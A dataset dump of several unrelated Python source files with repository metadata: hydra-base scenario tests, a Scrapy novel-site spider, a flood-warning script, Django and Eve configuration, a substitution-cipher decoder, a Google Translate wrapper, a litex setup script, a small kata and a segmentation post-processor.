resource_scenario = new_scenario.resourcescenarios[0]\n        resource_attr_id = resource_scenario.resource_attr_id\n\n        dataset = Dataset()\n        dataset.type = 'descriptor'\n        dataset.name = 'Max Capacity'\n        dataset.unit = 'metres / second'\n        dataset.dimension = 'number of units per time unit'\n\n        dataset.value = 'I am an updated test!'
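        # NOTE: hedged sketch (not from the original test) of the diff shape that the assertions below rely on; the attribute names are taken from those assertions rather than from an independently verified hydra_base schema:\n        #   diff = hydra_base.compare_scenarios(scenario_1.id, scenario_2.id, user_id=...)\n        #   diff.resourcescenariosDiff    -> the single changed descriptor value\n        #   diff.groups.scenario_2_items  -> the single deleted resource group item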
\n\n hydra_base.add_data_to_attribute(scenario_id, resource_attr_id, dataset, user_id=self.user_id)\n\n item_to_remove = new_scenario.resourcegroupitems[0].id\n hydra_base.delete_resourcegroupitem(item_to_remove, user_id=self.user_id)\n\n updated_network = JSONObject(hydra_base.get_network(new_scenario.network_id, user_id=self.user_id))\n\n scenarios = updated_network.scenarios\n \n scenario_1 = None\n scenario_2 = None\n for s in scenarios:\n if s.id == new_scenario.id:\n scenario_1 = s \n else:\n scenario_2 = s\n\n scenario_diff = hydra_base.compare_scenarios(scenario_1.id, scenario_2.id, user_id=self.user_id)\n \n #print \"Comparison result: %s\"%(scenario_diff)\n\n assert len(scenario_diff.resourcescenariosDiff) == 1, \"Data comparison was not successful!\"\n\n # assert len(scenario_diff.constraints.common_constraints) == 1, \"Constraint comparison was not successful!\"\n \n # assert len(scenario_diff.constraints.scenario_2_constraints) == 1, \"Constraint comparison was not successful!\"\n\n assert len(scenario_diff.groups.scenario_2_items) == 1, \"Group comparison was not successful!\"\n assert scenario_diff.groups.scenario_1_items is None, \"Group comparison was not successful!\"\n\n return updated_network\n\n def test_purge_scenario(self):\n net = self.test_clone()\n\n scenarios_before = net.scenarios\n\n assert len(scenarios_before) == 2\n\n hydra_base.purge_scenario(scenarios_before[1].id, user_id=self.user_id)\n\n updated_net = JSONObject(hydra_base.get_network(net.id, user_id=self.user_id))\n\n scenarios_after = updated_net.scenarios\n\n assert len(scenarios_after) == 1\n\n self.assertRaises(HydraError, self.get_scenario, scenarios_before[1].id)\n\n assert str(scenarios_after[0]) == str(scenarios_before[0])\n\n def test_delete_scenario(self):\n net = self.test_clone()\n\n scenarios_before = net.scenarios\n\n assert len(scenarios_before) == 2\n\n hydra_base.delete_scenario(scenarios_before[1].id, user_id=self.user_id)\n\n updated_net = JSONObject(hydra_base.get_network(net.id, user_id=self.user_id))\n\n scenarios_after_delete = updated_net.scenarios\n\n assert len(scenarios_after_delete) == 1\n\n hydra_base.activate_scenario(scenarios_before[1].id, user_id=self.user_id)\n\n updated_net2 = JSONObject(hydra_base.get_network(net.id, user_id=self.user_id))\n\n scenarios_after_reactivate = updated_net2.scenarios\n\n assert len(scenarios_after_reactivate) == 2\n \n hydra_base.delete_scenario(scenarios_before[1].id, user_id=self.user_id)\n hydra_base.clean_up_network(net.id, user_id=self.user_id)\n updated_net3 = JSONObject(hydra_base.get_network(net.id, user_id=self.user_id))\n scenarios_after_cleanup = updated_net3.scenarios\n assert len(scenarios_after_cleanup) == 1\n self.assertRaises(HydraError, self.get_scenario, scenarios_before[1].id)\n \n def test_lock_scenario(self):\n\n network = self.create_network_with_data()\n \n network = hydra_base.get_network(network.id, user_id=self.user_id)\n\n scenario_to_lock = network.scenarios[0]\n scenario_id = scenario_to_lock.id\n \n log.info('Cloning scenario %s'%scenario_id)\n clone = self.clone_scenario(scenario_id)\n unlocked_scenario = self.get_scenario(clone.id)\n \n log.info(\"Locking scenario\")\n hydra_base.lock_scenario(scenario_id, user_id=self.user_id)\n\n locked_scenario = self.get_scenario(scenario_id)\n\n assert locked_scenario.locked == 'Y'\n\n dataset = Dataset()\n \n dataset.type = 'descriptor'\n dataset.name = 'Max Capacity'\n dataset.unit = 'metres / second'\n dataset.dimension = 'number of units per time unit'\n \n 
dataset.value = 'I am an updated test!'\n\n        locked_resource_scenarios = []\n        for rs in locked_scenario.resourcescenarios:\n            if rs.value.type == 'descriptor':\n                locked_resource_scenarios.append(rs)\n\n        unlocked_resource_scenarios = []\n        for rs in unlocked_scenario.resourcescenarios:\n            if rs.value.type == 'descriptor':\n                unlocked_resource_scenarios.append(rs)\n\n        resource_attr_id = unlocked_resource_scenarios[0].resource_attr_id\n\n        locked_resource_scenarios_value = None\n        for rs in locked_scenario.resourcescenarios:\n            if rs.resource_attr_id == resource_attr_id:\n                locked_resource_scenarios_value = rs.value\n\n        unlocked_resource_scenarios_value = None\n        for rs in unlocked_scenario.resourcescenarios:\n            if rs.resource_attr_id == resource_attr_id:\n                unlocked_resource_scenarios_value = rs.value\n        log.info(\"Updating a shared dataset\")\n        ds = unlocked_resource_scenarios_value\n        ds.dimension = 'updated_dimension'\n        updated_ds = JSONObject(hydra_base.update_dataset(ds, user_id=self.user_id))\n\n        updated_unlocked_scenario = self.get_scenario(unlocked_scenario.id)\n        #This should not have changed\n        updated_locked_scenario = self.get_scenario(locked_scenario.id)\n\n        locked_resource_scenarios_value = None\n        for rs in updated_locked_scenario.resourcescenarios:\n            if rs.resource_attr_id == resource_attr_id:\n                locked_resource_scenarios_value = rs.value\n\n        unlocked_resource_scenarios_value = None\n        for rs in updated_unlocked_scenario.resourcescenarios:\n            if rs.resource_attr_id == resource_attr_id:\n                unlocked_resource_scenarios_value = rs.value\n\n        self.assertRaises(HydraError, hydra_base.add_data_to_attribute, scenario_id, resource_attr_id, dataset, user_id=self.user_id)\n\n        #The most complicated situation is this:\n        #Change a dataset in an unlocked scenario, which is shared by a locked scenario.\n        #The original dataset should stay connected to the locked scenario and a new\n        #dataset should be created for the edited scenario.\n        hydra_base.add_data_to_attribute(unlocked_scenario.id, resource_attr_id, dataset, user_id=self.user_id)\n\n        updated_unlocked_scenario = self.get_scenario(unlocked_scenario.id)\n        #This should not have changed\n        updated_locked_scenario = self.get_scenario(locked_scenario.id)\n\n        locked_resource_scenarios_value = None\n        for rs in updated_locked_scenario.resourcescenarios:\n            if rs.resource_attr_id == resource_attr_id:\n                locked_resource_scenarios_value = rs.value\n\n        unlocked_resource_scenarios_value = None\n        for rs in updated_unlocked_scenario.resourcescenarios:\n            if rs.resource_attr_id == resource_attr_id:\n                unlocked_resource_scenarios_value = rs.value\n\n\n        assert locked_resource_scenarios_value.value != unlocked_resource_scenarios_value.value\n\n        item_to_remove = locked_scenario.resourcegroupitems[0].id\n        self.assertRaises(HydraError, hydra_base.delete_resourcegroupitem, item_to_remove, user_id=self.user_id)\n        log.info(\"Unlocking scenario\")\n        hydra_base.unlock_scenario(scenario_id, user_id=self.user_id)\n\n        locked_scenario = self.get_scenario(scenario_id)\n\n        assert locked_scenario.locked == 'N'\n\n\n    def test_get_attribute_data(self):\n        \"\"\"\n        Test for retrieval of data for an attribute in a scenario.\n        \"\"\"\n\n        new_net = self.create_network_with_data()\n\n        s = new_net.scenarios[0]\n\n        nodes = new_net.nodes\n\n        resource_attr = nodes[0].attributes[0]\n\n        attr_id = resource_attr.attr_id\n\n        all_matching_ras = []\n        for n in nodes:\n            for ra in n.attributes:\n                if ra.attr_id == attr_id:\n                    all_matching_ras.append(ra)\n                    continue\n\n        retrieved_ras = 
hydra_base.get_attribute_datasets(attr_id, s.id, user_id=self.user_id)\n\n ra_dict = {}\n for ra in retrieved_ras:\n ra_dict[ra.id] = ra\n \n assert len(retrieved_ras) == len(all_matching_ras)\n\n for rs in s.resourcescenarios:\n if ra_dict.get(rs.resource_attr_id):\n matching_rs = ra_dict[rs.resource_attr_id].resourcescenario\n assert str(rs) == str(matching_rs)\n \n def test_copy_data_from_scenario(self):\n\n \"\"\"\n Test copy_data_from_scenario : test that one scenario\n can be updated to contain the data of another with the same\n resource attrs.\n \"\"\"\n\n network = self.create_network_with_data()\n \n\n network = hydra_base.get_network(network.id, user_id=self.user_id)\n\n scenario = network.scenarios[0]\n source_scenario_id = scenario.id\n\n clone = self.clone_scenario(source_scenario_id)\n cloned_scenario = self.get_scenario(clone.id)\n\n resource_scenario = cloned_scenario.resourcescenarios[0]\n resource_attr_id = resource_scenario.resource_attr_id\n\n dataset = Dataset()\n dataset.type = 'descriptor'\n dataset.name = 'Max Capacity'\n dataset.unit = 'metres / second'\n dataset.dimension = 'number of units per time unit'\n \n dataset.value = 'I am an updated test!'\n \n\n hydra_base.add_data_to_attribute(source_scenario_id, resource_attr_id, dataset, user_id=self.user_id)\n\n scenario_diff = hydra_base.compare_scenarios(source_scenario_id, cloned_scenario.id, user_id=self.user_id)\n \n assert len(scenario_diff.resourcescenariosDiff) == 1, \"Data comparison was not successful!\"\n\n hydra_base.copy_data_from_scenario(resource_attr_id, cloned_scenario.id, source_scenario_id, user_id=self.user_id)\n\n scenario_diff = hydra_base.compare_scenarios(source_scenario_id, cloned_scenario.id, user_id=self.user_id)\n \n assert scenario_diff.resourcescenarios == None, \"Scenario update was not successful!\"\n\n def test_set_resourcescenario_dataset(self):\n\n \"\"\"\n Test the direct setting of a dataset id on a resource scenario \n \"\"\"\n\n network = self.create_network_with_data()\n \n\n network = hydra_base.get_network(network.id, user_id=self.user_id)\n\n scenario = network.scenarios[0]\n source_scenario_id = scenario.id\n\n clone = self.clone_scenario(source_scenario_id)\n cloned_scenario = self.get_scenario(clone.id)\n\n resource_scenario = cloned_scenario.resourcescenarios[0]\n resource_attr_id = resource_scenario.resource_attr_id\n\n dataset = Dataset()\n dataset.type = 'descriptor'\n dataset.name = 'Max Capacity'\n dataset.unit = 'metres / second'\n dataset.dimension = 'number of units per time unit'\n\n dataset.value = 'I am an updated test!' 
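        # NOTE: hedged sketch (not from the original test) of the two-step flow exercised below -- the dataset is stored first, then its id is bound to the resource attribute in the scenario; the names mirror the calls that follow:\n        #   stored = hydra_base.add_dataset(dataset, user_id=self.user_id)\n        #   hydra_base.set_resourcescenario_dataset(resource_attr_id,\n        #                                           source_scenario_id, stored.id,\n        #                                           user_id=self.user_id)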
\n\n        new_ds = hydra_base.add_dataset(dataset, user_id=self.user_id)\n\n        hydra_base.set_resourcescenario_dataset(resource_attr_id, source_scenario_id, new_ds.id, user_id=self.user_id)\n\n        updated_net = hydra_base.get_network(network.id, user_id=self.user_id)\n\n        updated_scenario = updated_net.scenarios[0]\n        scenario_rs = updated_scenario.resourcescenarios\n        for rs in scenario_rs:\n            if rs.resource_attr_id == resource_attr_id:\n                assert rs.value.value == 'I am an updated test!'\n\n    def test_add_data_to_attribute(self):\n\n        network = self.create_network_with_data()\n\n        empty_ra = network.links[0].attributes[-1]\n\n        scenario = network.scenarios[0]\n        scenario_id = scenario.id\n\n        resource_scenario = scenario.resourcescenarios[0]\n        resource_attr_id = resource_scenario.resource_attr_id\n\n        dataset = Dataset()\n        dataset.type = 'descriptor'\n        dataset.name = 'Max Capacity'\n        dataset.unit = 'metres / second'\n        dataset.dimension = 'number of units per time unit'\n\n        dataset.value = 'I am an updated test!'\n\n        updated_resource_scenario = hydra_base.add_data_to_attribute(scenario_id, resource_attr_id, dataset, user_id=self.user_id)\n\n        new_resource_scenario = hydra_base.add_data_to_attribute(scenario_id, empty_ra.id, dataset, user_id=self.user_id)\n\n        assert updated_resource_scenario.value.value == 'I am an updated test!', \"Value was not updated correctly!!\"\n        assert new_resource_scenario.value.value == 'I am an updated test!', \"Value was not updated correctly!!\"\n\nif __name__ == '__main__':\n    server.run()\n","repo_name":"openagua/hydra-base","sub_path":"unittests/test_scenario.py","file_name":"test_scenario.py","file_ext":"py","file_size_in_byte":34131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"27"} {"seq_id":"27355253628","text":"from ayugespidertools.common.utils import ToolsForAyu\nfrom ayugespidertools.items import AyuItem, DataItem\nfrom ayugespidertools.spiders import AyuSpider\nfrom scrapy.http import Request\nfrom scrapy.http.response.text import TextResponse\n\nfrom DemoSpider.items import TableEnum\n\n\"\"\"\n####################################################################################################\n# collection_website: faloo.com - example of async writes to MongoDB, implemented with motor\n# collection_content: Faloo web novel site\n# create_time: 2023-05-08\n# explain:\n# demand_code_prefix = \"\"\n####################################################################################################\n\"\"\"\n\n\nclass DemoMongoAsyncSpider(AyuSpider):\n    name = \"demo_mongo_async\"\n    allowed_domains = [\"faloo.com\"]\n    start_urls = [\"http://b.faloo.com/\"]\n\n    # Enum information for the database tables\n    custom_table_enum = TableEnum\n    custom_settings = {\n        \"ITEM_PIPELINES\": {\n            # Enable this entry to store the data in MongoDB\n            \"ayugespidertools.pipelines.AsyncMongoPipeline\": 300,\n        },\n        \"DOWNLOADER_MIDDLEWARES\": {\n            # Random request headers\n            \"ayugespidertools.middlewares.RandomRequestUaMiddleware\": 400,\n        },\n    }\n\n    def start_requests(self):\n        \"\"\"\n        GET the home page and fetch the item list data\n        \"\"\"\n        for page in range(1, 11):\n            url = f\"https://b.faloo.com/y_0_0_0_0_3_15_{page}.html\"\n            yield Request(\n                url=url,\n                callback=self.parse_first,\n                cb_kwargs={\n                    \"page\": page,\n                },\n                dont_filter=True,\n            )\n\n    def parse_first(self, response: TextResponse, page: int):\n        self.slog.info(f\"Crawling page {page} of the target site\")\n\n        book_info_list = ToolsForAyu.extract_with_xpath(\n            response=response,\n            query='//div[@class=\"TwoBox02_01\"]/div',\n            return_selector=True,\n        )\n\n        for book_info in book_info_list:\n            book_name = ToolsForAyu.extract_with_xpath(\n                response=book_info, 
query=\"div[2]//h1/@title\"\n            )\n\n            book_href = ToolsForAyu.extract_with_xpath(\n                response=book_info, query=\"div[2]//h1/a/@href\"\n            )\n            book_href = response.urljoin(book_href)\n\n            book_intro = ToolsForAyu.extract_with_xpath(\n                response=book_info, query='div[2]/div[@class=\"TwoBox02_06\"]/a/text()'\n            )\n\n            BookInfoItem = AyuItem(\n                book_name=book_name,\n                book_href=book_href,\n                book_intro=book_intro,\n                _table=TableEnum.book_info_list_table.value[\"value\"],\n                _mongo_update_rule={\"book_name\": book_name},\n            )\n            yield BookInfoItem\n","repo_name":"shengchenyang/DemoSpider","sub_path":"DemoSpider/spiders/demo_mongo_async.py","file_name":"demo_mongo_async.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} {"seq_id":"73782045513","text":"from floodsystem.stationdata import build_station_list, update_water_levels\nfrom floodsystem.geo import stations_by_distance, stations_within_radius, stations_by_river, rivers_with_station, \\\n    rivers_by_station_number\nfrom floodsystem.station import inconsistent_typical_range_stations\nfrom floodsystem.flood import stations_highest_rel_level\n\n\ndef run():\n    stations = build_station_list()\n    update_water_levels(stations)\n\n    # Ask user to enter the threshold number – this value is used as the cut-off for deciding how many at-risk stations\n    # there are.\n\n    n = int(input(\"Enter the number of stations to set as threshold: \"))\n\n    if n <= 0:\n        raise ValueError(\"Error, N must be an integer greater than 0\")\n\n    # Retrieve stations with no data available and report to user\n    empty_data_stations = []\n\n    for i in stations:\n        if i.latest_level is None:\n            empty_data_stations.append(i.name)\n\n    print(f\"Warning: The data for the following stations is currently unavailable:\"\n          f\" {empty_data_stations} \")\n    print(\"Monitor these stations manually\")\n\n    list = []\n\n    for station in stations_highest_rel_level(stations, n):\n        town = station[0].town\n        relative_water_level = station[1]\n        list.append((town, relative_water_level))\n\n    print()\n    print(f\"{n} highest relative water levels and their towns: \")\n    print()\n\n    severe_list = []\n    high_list = []\n    moderate_list = []\n    low_list = []\n\n    for i in list:\n        if i[1] > 1.5:\n            severe_list.append(i[0])\n        elif i[1] > 1.2:\n            high_list.append(i[0])\n        elif i[1] > 1:\n            moderate_list.append(i[0])\n        elif i[1] < 1:\n            low_list.append(i[0])\n\n    print(f\"Severe risk of flooding in these towns: {severe_list}\")\n    print(f\"High risk of flooding in these towns: {high_list}\")\n    print(f\"Moderate risk of flooding in these towns: {moderate_list}\")\n    print(f\"Low risk of flooding in these towns: {low_list}\")\n\n\nif __name__ == \"__main__\":\n    print(\"*** Task 2G: CUED Part IA Flood Warning System ***\")\n    run()\n\n","repo_name":"sushipackdushi/sp2112-Flood-Warning-System","sub_path":"Task2G.py","file_name":"Task2G.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} {"seq_id":"23290526255","text":"from django.urls import path, include\nfrom core.views import UserViewSet, LoginOrRegisterView, PhoneVerificationView\nfrom rest_framework_nested import routers\n\nrouter = routers.DefaultRouter()\nrouter.register(r\"users\", UserViewSet, basename=\"user\")\n# router.register(r\"verification\", VerificationViewSet, basename=\"verification\")\nuser_router = routers.NestedDefaultRouter(router, r\"users\", lookup=\"user\")\nurlpatterns = [\n    path(r\"login/\", 
LoginOrRegisterView.as_view()),\n    path(r\"verification/phone\", PhoneVerificationView.as_view()),\n    path(r\"\", include(router.urls)),\n    path(r\"\", include(user_router.urls)),\n]\n","repo_name":"jokerwho/cookiecutter-drf","sub_path":"{{cookiecutter.project_name}}/apps/core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} {"seq_id":"73190807113","text":"import yaml\n\nwith open(\"./models/payment_v0.yaml\", \"r\") as f:\n    schema = yaml.load(f.read())\n\n# Let's just use the local mongod instance. Edit as needed.\n# Please note that MONGO_HOST and MONGO_PORT could very well be left\n# out as they already default to a bare bones local 'mongod' instance.\nMONGO_HOST = 'localhost'\nMONGO_PORT = 27017\n\n# Skip these if your db has no auth. But it really should.\n# MONGO_USERNAME = ''\n# MONGO_PASSWORD = ''\n\nMONGO_DBNAME = 'form3'\n\npayments = {\n    # 'title' tag used in item links. Defaults to the resource title minus\n    # the final, plural 's'\n    'item_title': 'payment',\n    'allow_unknown': True,\n    # We choose to override global cache-control directives for this resource.\n    'cache_control': 'max-age=10,must-revalidate',\n    'cache_expires': 10,\n    'schema': schema\n}\n\n\n# Enable reads (GET) and inserts (POST) for resources/collections\n# (defaults to read-only access to the endpoint).\nRESOURCE_METHODS = ['GET', 'POST']\n# Enable reads (GET), edits (PATCH), replacements (PUT) and deletes of\n# individual items (defaults to read-only item access).\nITEM_METHODS = ['GET', 'PATCH', 'PUT', 'DELETE']\n# ALLOWED_FILTERS = ['*']\n# VALIDATE_FILTERS = True\nID_FIELD = 'id'\nITEM_LOOKUP_FIELD = 'id'\nITEM_URL = 'regex(\"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\")'\nIF_MATCH = False\nITEMS = 'data'\nDOMAIN = {'payments': payments}\n\n# This is for the JWT\nJWT_SECRET = \"secret\"\nJWT_ISSUER = \"form3\"\nJWT_AUDIENCES = ['admin']\n","repo_name":"e-nouri/form3_interivew","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} {"seq_id":"71448441993","text":"\"\"\"Decode a string encoded with a simple substitution cipher.\"\"\"\nimport json\nimport logging\nimport math\nimport secrets\nfrom typing import (Dict, List)\n\nimport tqdm\n\nlogging.basicConfig(\n    level=logging.DEBUG,\n    format=\"%(asctime)s :: %(levelname)s :: %(message)s\",\n    datefmt='%m-%d %H:%M:%S'\n)\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\nclass SimpleSubstitutionDecoder:\n    \"\"\"Decode a simple substitution cipher.\"\"\"\n\n    def __init__(self, text: str, ngrams: Dict[str, int], alphabet: List[str], start_swap_count=2,\n                 failure_count_limit=1000, swap_count_limit=3):\n        self._text = list(text)\n        self._alphabet = alphabet\n        self._n = sum(ngrams.values())\n        self._len = len(list(ngrams.keys())[0])\n        self._floor = math.log10(0.01 / self._n)\n        self._ngrams = self._calculate_log_probabilities(ngrams)\n        self._start_swap_count = start_swap_count\n        self._swap_count_limit = swap_count_limit\n        self._failure_count_limit = failure_count_limit\n\n    def _calculate_log_probabilities(self, ngrams: Dict[str, float]) -> Dict[str, float]:\n        \"\"\"\n        Calculate log probability for each ngram. 
The probability of a specific ngram is calculated\n by dividing the count of that ngram by the total number of ngram in our training corpus.\n The log probability is simply the logarithm of this number.\n \"\"\"\n for key in ngrams.keys():\n ngrams[key] = math.log10(ngrams[key] / self._n)\n return ngrams\n\n def decode(self, repeat_count):\n \"\"\"\n Make several repetitions of the decoding process and select the best result.\n \"\"\"\n max_score_text = ''\n max_score = -math.inf\n for _ in tqdm.tqdm(range(repeat_count)):\n score, text = self._decode_inner()\n if score > max_score:\n logger.info(score)\n max_score = score\n max_score_text = ''.join(text)\n logger.info(max_score_text)\n return max_score_text\n\n def _decode_inner(self):\n \"\"\"\n Main decode function. Implement hill-climbing algorithm.\n Swap swap_count symbols in the text.\n If after that transposition text became more \"closer\" to Russian then we apply this transposition.\n Otherwise we roll back this transposition and try other one. Repeat the described procedure some times.\n If max_fitness_score does not change already self._failure_count_limit times increase swap_count by 1.\n If swap_count became grater than self._swap_count_limit end the procedure.\n :return: text witch is more \"closer\" to Russian from all text variants.\n \"\"\"\n max_fitness_score_text = self._text.copy()\n max_fitness_score = self._get_fitness_score(max_fitness_score_text)\n failure_count = 0\n swap_count = self._start_swap_count\n while failure_count <= self._failure_count_limit and swap_count <= self._swap_count_limit:\n current_fitness_score_text = self._swap_alphabet_symbols(max_fitness_score_text.copy(), swap_count)\n current_fitness_score = self._get_fitness_score(current_fitness_score_text)\n if current_fitness_score > max_fitness_score:\n max_fitness_score = current_fitness_score\n max_fitness_score_text = current_fitness_score_text\n failure_count = 0\n swap_count = self._start_swap_count\n else:\n failure_count = failure_count + 1 if failure_count != self._failure_count_limit else 0\n swap_count = swap_count + 1 if failure_count == self._failure_count_limit else swap_count\n return max_fitness_score, max_fitness_score_text\n\n def _get_fitness_score(self, text):\n \"\"\"\n Calculate log probability score of the text. This log probability is used as the 'fitness' of a\n piece of text, a higher number means it is more likely to be decoded text,\n while a lower number means it is less likely to be decoded text.\n \"\"\"\n score = 0.0\n for i in range(len(text) - self._len):\n if ''.join(text[i:i + self._len]) in self._ngrams:\n score += self._ngrams[''.join(text[i:i + self._len])]\n else:\n score += self._floor\n return score\n\n def _swap_alphabet_symbols(self, text, number):\n \"\"\"\n Swap number of random chosen from self.alphabet symbols in text cyclically. 
Let number=3\n symbols2swap={'А','Б','В'} then all occurrences of 'A' will be replaced by 'Б', 'Б' will be replaced by 'В'\n and 'В' will be replaced by 'А'.\n :param text: text in which needs to swap symbols\n :param number: number of symbols to swap\n :return: text with symbols that are already swapped\n \"\"\"\n symbols2swap = set()\n while len(symbols2swap) != number:\n symbols2swap.add(secrets.choice(self._alphabet))\n symbols2swap = list(symbols2swap)\n for idx, symbol in enumerate(text):\n if symbol in symbols2swap:\n text[idx] = symbols2swap[symbols2swap.index(symbol) - 1]\n return text\n\n\nif __name__ == '__main__':\n russian_alphabet = ['А', 'Б', 'В', 'Г', 'Д', 'Е', 'Ё', 'Ж', 'З', 'И', 'Й', 'К', 'Л', 'М', 'Н', 'О', 'П', 'Р', 'С',\n 'Т', 'У', 'Ф', 'Х', 'Ц', 'Ч', 'Ш', 'Щ', 'Ъ', 'Ы', 'Ь', 'Э', 'Ю', 'Я', ' ']\n with open('ru_trigrams.json', 'r') as ngrams_file:\n ngrams_ = json.load(ngrams_file)\n with open('texts/text_to_decode_1.txt', 'r', encoding='utf-8') as text_file:\n text_ = text_file.read()\n decoder = SimpleSubstitutionDecoder(text_, ngrams_, russian_alphabet)\n decoded_text = decoder.decode(500)\n with open('result.txt', 'w', encoding='utf-8') as output_file:\n output_file.write(decoded_text)\n","repo_name":"BroodingKangaroo/bsu","sub_path":"simple_substitution_decoder/decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":5925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19234115","text":"\nfrom googletranslate.googletranslate import main as gtranslate\n\n\ndef translate(word, item=None):\n \"\"\"\n python -m googletranslate.googletranslate -s \"translate.google.cn\" -r plain zh-CN \"word\"\n \"\"\"\n class Args:\n target: str = 'zh-CN'\n query: str = ''\n host: str = 'translate.google.com'\n proxy: str = ''\n alternative: str = 'en'\n type: str = 'plain'\n synonyms: bool = False\n definitions: bool = True\n examples: bool = False\n tkk: str = ''\n Args.host = item['root_path'] if item else 'translate.google.cn'\n Args.query = word\n trans = []\n trans_group = []\n result = gtranslate(Args)\n tags = []\n for line in result.split('\\n'):\n if not line:\n continue\n elif line == '=========':\n trans_group.append('
<div>%s%s</div>' % (\n                '<br>'.join(trans),\n                ''.join(['</%s>' % t for t in tags[::-1]])\n            ))\n            trans = []\n            tags = []\n            continue\n        elif line.startswith('^_^:'):\n            line = '%s' % line\n        elif line.startswith('0_0:'):\n            line = '%s' % line\n        elif line.startswith('#'):\n            if tags:\n                line = '</%s><%s>%s' % (tags[-1], tags[-1], line)\n            else:\n                tags.append('ul')\n                tags.append('li')\n                line = '<%s><%s>%s' % (tags[-2], tags[-1], line)\n        else:\n            line = '%s' % line\n        trans.append(line)\n    if trans:\n        trans_group.append('<div>%s%s</div>' % (\n            '<br>'.join(trans),\n            ''.join(['</%s>' % t for t in tags[::-1]])\n        ))\n    return trans_group\n\n\ndef init():\n    title = 'Google 翻译'\n    dict_uuid = 'gtranslate'\n    about = 'google-translate-for-goldendict<br>
https://github.com/xinebf/google-translate-for-goldendict'\n enable = True\n config = {\n 'title': title,\n 'uuid': dict_uuid,\n 'logo': 'google_translate.ico',\n 'about': about,\n 'root_path': 'translate.google.com',\n 'query': translate,\n 'cache': {},\n 'type': 'app',\n 'error': '',\n 'enable': enable,\n }\n return config\n","repo_name":"liuyug/flask-mdict","sub_path":"flask_mdict/google.py","file_name":"google.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","stars":90,"dataset":"github-code","pt":"27"} +{"seq_id":"18850788938","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nfrom collections import OrderedDict\n\n\ncurrent_path = os.path.dirname(os.path.realpath(__file__))\n\n# name (recursive clone, develop)\nrepos = [\n (\"litex\", (True, True)),\n (\"litedram\", (False, True)),\n (\"litescope\", (False, True)),\n (\"litejesd204b\", (False, True)),\n]\nrepos = OrderedDict(repos)\n\nif len(sys.argv) < 2:\n print(\"Available commands:\")\n print(\"- init\")\n print(\"- install\")\n print(\"- update\")\n exit()\n\nif sys.argv[1] == \"init\":\n for name in repos.keys():\n need_recursive, need_develop = repos[name]\n # clone repo (recursive if needed)\n print(\"[cloning \" + name + \"]...\")\n url = \"http://github.com/enjoy-digital/\" + name\n opts = \"--recursive\" if need_recursive else \"\"\n os.system(\"git clone \" + url + \" \" + opts)\n\nelif sys.argv[1] == \"install\":\n for name in repos.keys():\n need_recursive, need_develop = repos[name]\n # develop if needed\n print(\"[installing \" + name + \"]...\")\n if need_develop:\n os.chdir(os.path.join(current_path, name))\n os.system(\"python3 setup.py develop\")\n\nelif sys.argv[1] == \"update\":\n for name in repos.keys():\n # update\n print(\"[updating \" + name + \"]...\")\n os.chdir(os.path.join(current_path, name))\n os.system(\"git pull\")\n","repo_name":"m-labs/sayma_test","sub_path":"litex_setup.py","file_name":"litex_setup.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"19512843670","text":"import unittest\n\n\nclass Solution:\n def addDigits(self, num: int) -> int:\n str_num = str(num)\n nums = list(str_num)\n result = 0\n for num in nums:\n result += int(num)\n if result >= 10:\n result -= 9\n return result\n\n\nclass TestAddDigitst(unittest.TestCase):\n def setUp(self):\n self.sol = Solution()\n\n def test_add_digits_38(self):\n num = 38\n\n one_digit = self.sol.addDigits(num)\n\n self.assertEqual(one_digit, 2)\n\n def test_add_digits_1(self):\n num = 1\n\n one_digit = self.sol.addDigits(num)\n\n self.assertEqual(one_digit, 1)\n\n def test_add_digits_999(self):\n num = 999\n\n one_digit = self.sol.addDigits(num)\n\n self.assertEqual(one_digit, 9)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"brigitteunger/katas","sub_path":"test_add_digits.py","file_name":"test_add_digits.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42174826591","text":"import cv2\nimport numpy as np\nfrom shapely.geometry import Polygon\nimport pyclipper\n\nfrom concern.config import Configurable, State\nimport concern.webcv2 as webcv2\n\n\nclass SegDetectorRepresenter(Configurable):\n thresh = State(default=0.3)\n box_thresh = State(default=0.7)\n max_candidates = State(default=100)\n resize = State(default=False)\n\n dest = State(default='binary')\n\n def 
__init__(self, cmd={}, **kwargs):\n self.load_all(**kwargs)\n\n self.min_size = 3\n self.scale_ratio = 0.4\n if 'debug' in cmd:\n self.debug = cmd['debug']\n if 'thresh' in cmd:\n self.thresh = cmd['thresh']\n if 'box_thresh' in cmd:\n self.box_thresh = cmd['box_thresh']\n if 'dest' in cmd:\n self.dest = cmd['dest']\n\n def represent(self, batch, _pred):\n '''\n batch: (image, polygons, ignore_tags\n batch: a dict produced by dataloaders.\n image: tensor of shape (N, C, H, W).\n polygons: tensor of shape (N, K, 4, 2), the polygons of objective regions.\n ignore_tags: tensor of shape (N, K), indicates whether a region is ignorable or not.\n shape: the original shape of images.\n filename: the original filenames of images.\n pred:\n binary: text region segmentation map, with shape (N, 1, H, W)\n thresh: [if exists] thresh hold prediction with shape (N, 1, H, W)\n thresh_binary: [if exists] binarized with threshhold, (N, 1, H, W)\n '''\n images = batch['image']\n pred = _pred[self.dest]\n segmentation = self.binarize(pred)\n boxes_batch = []\n preds = []\n for batch_index in range(images.size(0)):\n height, width = batch['shape'][batch_index]\n boxes, single_pred = 